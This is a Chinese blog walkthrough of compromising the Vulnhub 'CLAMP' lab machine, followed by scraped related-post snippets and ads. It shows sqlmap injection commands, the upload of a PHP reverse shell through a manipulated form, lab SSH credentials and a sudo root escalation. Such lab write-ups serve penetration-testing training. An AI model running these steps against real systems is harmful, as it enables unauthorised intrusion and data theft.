clamp靶机复现

于 2024-08-14 19:51:08 发布
阅读量789 收藏 10
点赞数 13
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/141198894
版权

靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.143

目录扫描

dirsearch 192.168.112.143

访问浏览器

提示让我们扫描更多的目录

换个更大的字典,扫出来一个 /nt4stopc/ 目录

目录拼接

拼接 /nt4stopc/

发现页面中有很多判断题

对为1,错为0

按顺序判断下来为 0110111001

拼接访问页面

SQL注入

点击网页发现存在id参数

尝试测试sql注入

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --batch

果然发现存在sql注入

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --dbs --batch

查看当前数据库

查看tatil表

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 -D tatil --tables --batch

字段内容为 hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php

进行解码 uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

再次拼接

再次拼接

拼接upload.php

发现文件上传点,但是没有提交按钮,自己添加一个

添加成功

getshell

kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

开启监听

上传文件

http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

md5加密后访问文件

提权

生成交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下看见important.pcapng文件,查看他

发现有一个email信息

url解码后得到

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work

账号: mkelepce

密码:mklpc-osas112.

登陆成功

sudo -l查看免密操作

发现可以进行任何操作

直接sudo su

提权成功

CcHKer
关注
vulnhub靶机之ClAMP
timesleep的博客
12-06 252
首先我们得靶机IP为192.168.34.154 kaliIP为192.168.34.175 首先扫描端口 然后访问一下80 我们接着枚举一下目录 访问一下 也就是0110111001我们把他加到目录后面试试 然后并重定向到了这个界面 然后我们查看源码 大概猜测有sql注入我们用sqlmap跑一下 sqlmap -u "http://192.168.34.154/nt4stopc/0...
vulnhub靶机CLAMP渗透测试
Long_gone的博客
12-07 472
一、扫描 打开靶机后先扫描靶机IP: arp-scan 192.168.34.0/24 经检验,确定靶机IP为:192.168.34.154,然后扫描靶机端口开放情况: nmap -sV -A -p 0-65535 192.168.34.154 发现靶机只开放了22和80端口,先访问80端口看一下: 进来发现是个这个界面,然后扫描一下它的目录,主要这里要加大字段进行目录爆破,否则得话是爆...
CLAMP 1.0.1靶机
weixin_71232352的博客
08-12 285
CLAMP 1.0.1靶机
CLAMP 1.0.1靶机详解
y15754的博客
07-31 775
在var/www/html下有important.pcapng文件。目前没有突破点,只能扫目录或爆破ssh服务,盲爆不太现实,扫目录。发现账号密码 mkelepce:mklpc-osas112.011011后面是1001合起来是一个目录。然后会自动拼接后面的东西出现下面东西。加一个按钮上传上去,会出现路径。拼接目录/nt4stopc/上传反弹shell,成功反弹。点一下这个位置发现存在注入。错的用0表示对的用1表示。加上upload.php。有带ssh文件的内容。
漏洞复现 -- CLAMP: 1.0.1
2301_80854251的博客
06-28 515
漏洞复现 -- CLAMP: 1.0.1
Pytorch clamp理解
happyday_d的博客
12-11 5078
Pytorch clamp理解 torch.clamp(input, min, max, out=None) → Tensor 将输入input张量每个元素的夹紧到区间 [min,max] ,并返回结果到一个新张量。 操作定义如下: | min, if x_i < min y_i = | x_i, if min <= x_i <= max | max, ...
pytorch clamp()使用
风行
09-23 1486
参考:https://pytorch.org/docs/stable/generated/torch.clamp.html#torch.clamp 使用格式 torch.clamp(input, min, max, out=None)→ Tensor 在最大值和最小值之间对input进行裁剪 yi={min⁡ if xi<min⁡xi if min≤xi≤max⁡max⁡ if xi>max⁡ \mathrm{y}_{\mathrm{
【houdini vex】clamp、fit
wx9090的博客
07-07 914
Github复现之TransUnet更新
热门推荐
qq_20373723的博客
05-24 4万+
上一篇关于TransUnet的GitHub复现,大家反映效果不好,调参也不好调,我把模型单独拿出来,放到另外一个框架,供大家参考学习(上一篇链接:https://blog.csdn.net/qq_20373723/article/details/115548900) 我这里训练了20个epoch,下面先给出效果正常的情况: 原图 预测结果 整体代码结构: 1.数据准备,文件名字请务必保持一致,不过你也可以去代码里改 一级目录,红线的三个,其它不用管 二级目录 三级目录就是图像和标签,二者名字保持一
css -webkit-line-clamp WebKit的CSS扩展(WebKit是私有属性)
09-27
在这个文本中,我们首先要了解的知识点是关于Webkit浏览器引擎的一个非标准CSS属性:-webkit-line-clamp。这个属性的用途在于限制一个块级元素内的文本显示行数,超出部分则通过省略号隐藏,从而达到所谓的“文本...
CSS3属性 line-clamp控制文本行数的使用
01-19
-webkit-line-clamp 是一个 不规范的属性(unsupported WebKit property),它没有出现在 CSS 规范草案中。 为了实现该效果,它需要组合其他外来的WebKit属性。常见结合属性: display: -webkit-box; 必须结合的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8494
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明-毕业设计.zip
10-10
基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明-毕业设计.zip,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。 基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明-毕业设计.zip,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。 基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明-毕业设计.zip,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明。
卡车无人机路径优化,卡车带无人机路径优化 车辆无人机路径优化 代码具有可复制性
10-10
卡车无人机路径优化,卡车带无人机路径优化。 车辆无人机路径优化。 代码具有可复制性
【风电预测】基于matlab支持向量机SVM-Adaboost风电场预测【含Matlab源码 期】.zip
10-10
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
SpringBoot+Vue高校奖助学金系统答辩PPT.ppt
10-10
计算机毕业设计答辩PPT
Nodejs+Vue物业管理系统答辩PPT.pptx
10-10
计算机毕业设计答辩PPT
最新更新-中国碳排放1KM栅格数据(至2022年)
最新发布
10-10
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/142834015 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理
简化高功率PFC前端:ACTIVE-CLAMP Boost设计
"ACTIVE-CLAMP BOOST作为一款孤立式PFC前端转换器,其设计旨在提升电力级系统的需求,尤其是对于高功率输出应用。本章在前两章的基础上,进一步简化了传统的两级前端架构,目标是构建一个仅包含孤立式PFC转换器的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值